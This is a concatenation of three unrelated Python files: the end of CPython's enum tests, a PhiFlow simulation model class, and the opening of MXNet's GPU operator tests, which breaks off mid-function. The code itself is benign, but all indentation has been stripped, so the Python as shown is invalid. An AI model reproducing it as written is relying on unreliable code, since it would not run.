def test_default_missing(self):
with self.assertRaisesRegex(
ValueError,
"'RED' is not a valid TestIntFlag.Color",
) as ctx:
self.Color('RED')
self.assertIs(ctx.exception.__context__, None)
P = IntFlag('P', 'X Y')
with self.assertRaisesRegex(ValueError, "'X' is not a valid P") as ctx:
P('X')
self.assertIs(ctx.exception.__context__, None)
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestVerify(unittest.TestCase):
def test_continuous(self):
@verify(CONTINUOUS)
class Auto(Enum):
FIRST = auto()
SECOND = auto()
THIRD = auto()
FORTH = auto()
#
@verify(CONTINUOUS)
class Manual(Enum):
FIRST = 3
SECOND = 4
THIRD = 5
FORTH = 6
#
with self.assertRaisesRegex(ValueError, 'invalid enum .Missing.: missing values 5, 6, 7, 8, 9, 10, 12'):
@verify(CONTINUOUS)
class Missing(Enum):
FIRST = 3
SECOND = 4
THIRD = 11
FORTH = 13
#
with self.assertRaisesRegex(ValueError, 'invalid flag .Incomplete.: missing values 32'):
@verify(CONTINUOUS)
class Incomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 16
FORTH = 64
#
with self.assertRaisesRegex(ValueError, 'invalid flag .StillIncomplete.: missing values 16'):
@verify(CONTINUOUS)
class StillIncomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 11
FORTH = 32
def test_composite(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': aliases b and d are missing combined values of 0x3 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(Flag):
b = 3
c = 4
d = 6
#
self.assertEqual(enum.show_flag_values(3), [1, 2])
class Bizarre(IntFlag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': alias d is missing value 0x2 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(IntFlag):
c = 4
d = 6
self.assertEqual(enum.show_flag_values(2), [2])
def test_unique_clean(self):
@verify(UNIQUE)
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@verify(UNIQUE)
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@verify(UNIQUE)
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@verify(UNIQUE)
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
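# Sanity checks for the name-classification helpers used by EnumType:
# enum._is_sunder, enum._is_dunder, and enum._is_private.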
class TestHelpers(unittest.TestCase):
sunder_names = '_bad_', '_good_', '_what_ho_'
dunder_names = '__mal__', '__bien__', '__que_que__'
private_names = '_MyEnum__private', '_MyEnum__still_private'
private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_'
random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__'
def test_sunder(self):
for name in self.sunder_names + self.private_and_sunder_names:
self.assertTrue(enum._is_sunder(name), '%r is not a sunder name?' % name)
for name in self.dunder_names + self.private_names + self.random_names:
self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name)
def test_dunder(self):
for name in self.dunder_names:
self.assertTrue(enum._is_dunder(name), '%r is not a dunder name?' % name)
for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names:
self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name)
def test_is_private(self):
for name in self.private_names + self.private_and_sunder_names:
self.assertTrue(enum._is_private('MyEnum', name), '%r is not a private name?' % name)
for name in self.sunder_names + self.dunder_names + self.random_names:
self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?' % name)
class TestEnumTypeSubclassing(unittest.TestCase):
pass
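# Expected pydoc help text for the Color enum defined in TestStdLib below. The
# %s placeholder is filled with this test module's name; which variant is
# compared depends on whether docstrings are available in the current build.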
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumType:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumType:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumType),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(set(values.keys()), set(result.keys()))
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumType),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumType, object=EnumType.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
self.assertEqual(
len(values), len(result),
"%s != %s" % ([a.name for a in values], [a.name for a in result])
)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_test_simple_enum(self):
@_simple_enum(Enum)
class SimpleColor:
RED = 1
GREEN = 2
BLUE = 3
class CheckedColor(Enum):
RED = 1
GREEN = 2
BLUE = 3
self.assertTrue(_test_simple_enum(CheckedColor, SimpleColor) is None)
SimpleColor.GREEN._value_ = 9
self.assertRaisesRegex(
TypeError, "enum mismatch",
_test_simple_enum, CheckedColor, SimpleColor,
)
class CheckedMissing(IntFlag, boundary=KEEP):
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
CM = CheckedMissing
self.assertEqual(list(CheckedMissing), [CM.SIXTY_FOUR, CM.ONE_TWENTY_EIGHT, CM.TWENTY_FORTY_EIGHT])
#
@_simple_enum(IntFlag, boundary=KEEP)
class Missing:
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
M = Missing
self.assertEqual(list(CheckedMissing), [M.SIXTY_FOUR, M.ONE_TWENTY_EIGHT, M.TWENTY_FORTY_EIGHT])
#
_test_simple_enum(CheckedMissing, Missing)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum, not_exported={'bin', 'show_flag_values'})
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
CONVERT_STRING_TEST_NAME_D = 5
CONVERT_STRING_TEST_NAME_C = 5
CONVERT_STRING_TEST_NAME_B = 5
CONVERT_STRING_TEST_NAME_A = 5 # This one should sort first.
CONVERT_STRING_TEST_NAME_E = 5
CONVERT_STRING_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def setUp(self):
# Reset the module-level test variables to their original integer
# values, otherwise the already created enum values get converted
# instead.
for suffix in ['A', 'B', 'C', 'D', 'E', 'F']:
globals()[f'CONVERT_TEST_NAME_{suffix}'] = 5
globals()[f'CONVERT_STRING_TEST_NAME_{suffix}'] = 5
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexicographical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')
and name not in dir(IntEnum)],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(python_version == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(python_version >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_TEST_'))
def test_convert_repr_and_str(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_STRING_TEST_'))
self.assertEqual(repr(test_type.CONVERT_STRING_TEST_NAME_A), '%s.CONVERT_STRING_TEST_NAME_A' % SHORT_MODULE)
self.assertEqual(str(test_type.CONVERT_STRING_TEST_NAME_A), 'CONVERT_STRING_TEST_NAME_A')
self.assertEqual(format(test_type.CONVERT_STRING_TEST_NAME_A), '5')
# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
class TestStrEnumConvert(unittest.TestCase):
def setUp(self):
global CONVERT_STR_TEST_1
global CONVERT_STR_TEST_2
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
def test_convert(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_STR_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')
and name not in dir(StrEnum)],
[], msg='Names other than CONVERT_STR_* found.')
def test_convert_repr_and_str(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_STR_'))
self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % SHORT_MODULE)
self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')
if __name__ == '__main__':
unittest.main()
|
model.py
|
# coding=utf-8
from __future__ import print_function
import logging, os, numbers, six, numpy, threading, inspect, time
from os.path import isfile
import PDE_Control.legacy.phi.fluidformat, phi.math.nd
from PDE_Control.legacy.phi.viz.plot import PlotlyFigureBuilder
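# Decorator that serializes calls to a method: a per-instance lock is created
# lazily (guarded by a shared outer lock) and held while the wrapped method runs.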
def synchronized_method(method):
outer_lock = threading.Lock()
lock_name = "__" + method.__name__ + "_lock" + "__"
def sync_method(self, *args, **kws):
with outer_lock:
if not hasattr(self, lock_name): setattr(self, lock_name, threading.Lock())
lock = getattr(self, lock_name)
with lock:
return method(self, *args, **kws)
return sync_method
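# Caches the array produced by `generator` and recomputes it only when the
# supplied invalidation version changes; access is synchronized so concurrent
# viewers do not trigger duplicate regeneration.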
class TimeDependentField(object):
def __init__(self, name, generator):
self.name = name
self.generator = generator
self.array = None
self.invalidation_version = -1
@synchronized_method
def get(self, invalidation_version):
if invalidation_version != self.invalidation_version:
self.array = self.generator()
self.invalidation_version = invalidation_version
return self.array
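# Base class for interactive simulation applications: manages the scene
# directory and logging, optional image/data recording, and exposes GUI
# controls and actions that prepare() discovers by naming convention
# (attributes prefixed "value_", methods prefixed "action_").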
class FieldSequenceModel(object):
def __init__(self,
name="Φ-*flow* Application",
subtitle="Interactive demo based on PhiFlow",
fields=None,
stride=1,
record_images=False, record_data=False,
base_dir=os.path.expanduser(os.path.join("~", "model")),
recorded_fields=None,
summary=None,
custom_properties=None,
target_scene=None,
objects_to_save=None):
self.name = name
self.subtitle = subtitle
self.summary = summary if summary else name
if fields:
self.fields = {name: TimeDependentField(name, generator) for (name,generator) in fields.items()}
else:
self.fields = {}
self.message = None
self.time = 0
self._invalidation_counter = 0
self.print_to_console = True
self._controls = []
self._actions = []
self._traits = []
self.prepared = False
self.current_action = None
self._pause = False
# Setup directory & Logging
self.objects_to_save = [ self.__class__ ] if objects_to_save is None else list(objects_to_save)
self.base_dir = os.path.expanduser(base_dir)
if not target_scene:
self.new_scene()
self.uses_existing_scene = False
else:
self.scene = target_scene
self.uses_existing_scene = True
if not isfile(self.scene.subpath("info.log")):
logfile = self.scene.subpath("info.log")
else:
index = 2
while True:
logfile = self.scene.subpath("info_%d.log"%index)
if not isfile(logfile): break
else: index += 1
logging.basicConfig(filename=logfile, level=logging.INFO, format="%(message)s (%(levelname)s), %(asctime)s\n\n")
print("Scene directory is %s" % self.scene.path)
# Recording
self.record_images = record_images
self.record_data = record_data
self.recorded_fields = recorded_fields if recorded_fields is not None else []
self.rec_all_slices = False
self.sequence_stride = stride
self._custom_properties = custom_properties if custom_properties else {}
self.figures = PlotlyFigureBuilder()
self._simulation = None
self.info("Setting up model...")
def new_scene(self):
self.scene = phi.fluidformat.new_scene(self.base_dir, self.scene_summary(), mkdir=True)
@property
def sim(self):
return self._simulation
@sim.setter
def sim(self, sim):
self._simulation = sim
def set_simulation(self, sim):
self.sim = sim
@property
def directory(self):
return self.scene.path
@property
def image_dir(self):
return self.scene.subpath("images")
def get_image_dir(self):
return self.scene.subpath("images", create=True)
def progress(self):
self.time += 1
self.step()
self.invalidate()
def invalidate(self):
self._invalidation_counter += 1
def step(self):
self.info("Implement step(self) to have something happen")
@property
def fieldnames(self):
return sorted(self.fields.keys())
def get_field(self, fieldname):
if not fieldname in self.fields:
raise KeyError("Field %s not declared. Available fields are %s" % (fieldname, self.fields.keys()))
return self.fields[fieldname].get(self._invalidation_counter)
def add_field(self, name, generator):
assert not self.prepared, "Cannot add fields to a prepared model"
self.fields[name] = TimeDependentField(name, generator)
@property
def actions(self):
return self._actions
def add_action(self, name, methodcall):
self._actions.append(Action(name, methodcall, name))
def run_action(self, action):
message_before = self.message
action.method()
self.invalidate()
message_after = self.message
if message_before == message_after:
if self.message is None or self.message == "":
self.message = display_name(action.name)
else:
self.message += " | " + display_name(action.name)
@property
def traits(self):
return self._traits
def add_trait(self, trait):
assert not self.prepared, "Cannot add traits to a prepared model"
self._traits.append(trait)
@property
def controls(self):
return self._controls
def prepare(self):
if self.prepared:
return
logging.info("Gathering model data...")
self.prepared = True
# Controls
for name in dir(self):
val = getattr(self, name)
editable_value = None
if isinstance(val, EditableValue):
editable_value = val
setattr(self, name, val.initial_value) # Replace EditableValue with initial value
elif name.startswith("value_"):
value_name = display_name(name[6:])
dtype = type(val)
if dtype == bool:
editable_value = EditableBool(value_name, val)
elif isinstance(val, numbers.Integral): # Int
editable_value = EditableInt(value_name, val)
elif isinstance(val, numbers.Number): # Float
editable_value = EditableFloat(value_name, val)
elif isinstance(val, six.string_types):
editable_value = EditableString(value_name, val)
if editable_value:
self._controls.append(Control(self, name, editable_value))
# Actions
for method_name in dir(self):
if method_name.startswith("action_") and callable(getattr(self, method_name)):
self._actions.append(Action(display_name(method_name[7:]), getattr(self, method_name), method_name))
# Scene
self._update_scene_properties()
source_files_to_save = set()
for object in self.objects_to_save:
source_files_to_save.add(inspect.getabsfile(object))
for source_file in source_files_to_save:
self.scene.copy_src(source_file)
def add_custom_property(self, key, value):
self._custom_properties[key] = value
if self.prepared: self._update_scene_properties()
def add_custom_properties(self, dict):
self._custom_properties.update(dict)
if self.prepared: self._update_scene_properties()
def _update_scene_properties(self):
if self.uses_existing_scene: return
app_name = inspect.getfile(self.__class__)
app_path = inspect.getabsfile(self.__class__)
properties = {
"instigator": "FieldSequenceModel",
"traits": self.traits,
"app": str(app_name),
"app_path": str(app_path),
"name": self.name,
"description": self.subtitle,
"all_fields": self.fieldnames,
"actions": [action.name for action in self.actions],
"controls": [{control.name: control.value} for control in self.controls],
"summary": self.scene_summary(),
"time_of_writing": self.time,
}
if self._simulation:
properties.update(self._simulation.as_dict())
properties.update(self.custom_properties())
self.scene.properties = properties
def settings_str(self):
return "".join([
" " + str(control) for control in self.controls
])
def custom_properties(self):
return self._custom_properties
def info(self, message):
if isinstance(message, int):
self.time = message
else:
self.message = message
if self.print_to_console:
print(str(self.time)+": "+message)
logging.info(message)
def debug(self, message):
logging.info(message)
def scene_summary(self):
return self.summary
def list_controls(self, names):
return
def show(self, *args, **kwargs):
from phi.viz.dash_gui import DashFieldSequenceGui
gui = DashFieldSequenceGui(self, *args, **kwargs)
return gui.show()
@property
def status(self):
pausing = "/Pausing" if self._pause and self.current_action else ""
action = self.current_action if self.current_action else "Idle"
message = (" - %s"%self.message) if self.message else ""
return "{}{} ({}){}".format(action, pausing, self.time, message)
def run_step(self, framerate=None, allow_recording=True):
try:
self.current_action = "Running"
starttime = time.time()
self.progress()
if allow_recording and self.time % self.sequence_stride == 0:
self.record_frame()
if framerate is not None:
duration = time.time() - starttime
rest = 1.0/framerate/self.sequence_stride - duration
if rest > 0:
self.current_action = "Waiting"
time.sleep(rest)
finally:
self.current_action = None
def play(self, max_steps=None, callback=None, framerate=None, allow_recording=True):
def target():
self._pause = False
step_count = 0
while not self._pause:
self.run_step(framerate=framerate, allow_recording=allow_recording)
step_count += 1
if max_steps and step_count >= max_steps:
break
if callback is not None:
callback()
thread = threading.Thread(target=target)
thread.start()
return self
def pause(self):
self._pause = True
@property
def running(self):
return self.current_action is not None
def record_frame(self):
self.current_action = "Recording"
files = []
if self.record_images:
os.path.isdir(self.image_dir) or os.makedirs(self.image_dir)
arrays = [self.get_field(field) for field in self.recorded_fields]
for name, array in zip(self.recorded_fields, arrays):
files += self.figures.save_figures(self.image_dir, name, self.time, array)
if self.record_data:
arrays = [self.get_field(field) for field in self.recorded_fields]
arrays = [a.staggered if isinstance(a, phi.math.nd.StaggeredGrid) else a for a in arrays]
files += phi.fluidformat.write_sim_frame(self.directory, arrays, self.recorded_fields, self.time)
if files:
self.message = "Frame written to %s" % files
self.current_action = None
def benchmark(self, sequence_count):
self._pause = False
step_count = 0
starttime = time.time()
for i in range(sequence_count):
self.run_step(framerate=None, allow_recording=False)
step_count += 1
if self._pause: break
time_elapsed = time.time() - starttime
return step_count, time_elapsed
def config_recording(self, images, data, fields):
self.record_images = images
self.record_data = data
self.recorded_fields = fields
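# Descriptors for GUI-editable parameters. Each stores a display name, a type
# tag ("float", "int", "bool", "text"), an initial value, an optional category
# and a (min, max) range; EditableFloat additionally chooses between a linear
# and a logarithmic slider scale.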
class EditableValue(object):
def __init__(self, name, type, initial_value, category, minmax, is_linear):
self.name = name
self.type = type
self.initial_value = initial_value
self.category = category
self.minmax = minmax
self.is_linear = is_linear
@property
def min_value(self):
return self.minmax[0]
@property
def max_value(self):
return self.minmax[1]
class EditableFloat(EditableValue):
def __init__(self, name, initial_value, minmax=None, category=None, log_scale=None):
if minmax is not None:
assert len(minmax) == 2, "minmax must be pair (min, max)"
if log_scale is None:
if minmax is None:
log_scale = True
else:
log_scale = minmax[1] / float(minmax[0]) > 10
if not minmax:
if log_scale:
magn = numpy.log10(initial_value)
minmax = (10.0**(magn-3.2), 10.0**(magn+2.2))
else:
if initial_value == 0.0:
minmax = (-10.0, 10.0)
elif initial_value > 0:
minmax = (0., 4. * initial_value)
else:
minmax = (2. * initial_value, -2. * initial_value)
else:
minmax = (float(minmax[0]), float(minmax[1]))
EditableValue.__init__(self, name, "float", initial_value, category, minmax, not log_scale)
@property
def use_log_scale(self):
return not self.is_linear
class EditableInt(EditableValue):
def __init__(self, name, initial_value, minmax=None, category=None):
if not minmax:
if initial_value == 0:
minmax = (-10, 10)
elif initial_value > 0:
minmax = (0, 4*initial_value)
else:
minmax = (2 * initial_value, -2 * initial_value)
EditableValue.__init__(self, name, "int", initial_value, category, minmax, True)
class EditableBool(EditableValue):
def __init__(self, name, initial_value, category=None):
EditableValue.__init__(self, name, "bool", initial_value, category, (False, True), True)
class EditableString(EditableValue):
def __init__(self, name, initial_value, category=None, rows=20):
EditableValue.__init__(self, name, "text", initial_value, category, ("", "A"*rows), True)
@property
def rows(self):
return len(self.max_value)
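# Binds an EditableValue to a model attribute: reads go through the model,
# writes update the attribute and invalidate cached fields so views refresh.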
class Control(object):
def __init__(self, model, attribute_name, editable_value):
self.model = model
self.attribute_name = attribute_name
self.editable_value = editable_value
@property
def value(self):
val = getattr(self.model, self.attribute_name)
if isinstance(val, numpy.float32):
return float(val)
if isinstance(val, numpy.float64):
return float(val)
return val
@value.setter
def value(self, value):
setattr(self.model, self.attribute_name, value)
self.model.invalidate()
@property
def name(self):
return self.editable_value.name
@property
def type(self):
return self.editable_value.type
@property
def id(self):
return self.attribute_name
def __str__(self):
return self.name + "_" + str(self.value)
@property
def range(self):
return self.editable_value.minmax
class Action(object):
def __init__(self, name, method, id):
self.name = name
self.method = method
self.method_name = id
@property
def id(self):
return self.method_name
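# Converts a python_name such as "reset_state" into a human-readable label
# ("Reset State"): the first letter is capitalized and each underscore becomes
# a space with the following character upper-cased.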
def display_name(python_name):
n = list(python_name)
n[0] = n[0].upper()
for i in range(1,len(n)):
if n[i] == "_":
n[i] = " "
if len(n) > i+1:
n[i+1] = n[i+1].upper()
return "".join(n)
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import pytest
import itertools
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.test_utils import check_symbolic_forward, check_symbolic_backward, discard_stderr
from mxnet.test_utils import default_context, rand_shape_2d, rand_ndarray, same, environment
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import check_sequence_reverse, allclose_function
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_gluon_probability_v1 import *
from test_gluon_probability_v2 import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_contrib_optimizer import test_adamw
del test_custom_op_fork #noqa
set_default_context(mx.gpu(0))
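# Compares mx.sym.contrib.count_sketch against a NumPy reference on GPU: the
# forward pass scatters sign-weighted inputs into out_dim buckets selected by
# the hash h, and the backward pass gathers the output gradient back through
# the same hash and signs.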
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
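# Checks mx.sym.contrib.fft on GPU against numpy.fft for 2D and 4D inputs. The
# operator emits real and imaginary parts interleaved along the last axis, so
# the NumPy reference is re-packed before comparison; the backward pass is
# validated against numpy.fft.ifft (scaled by the transform length).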
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
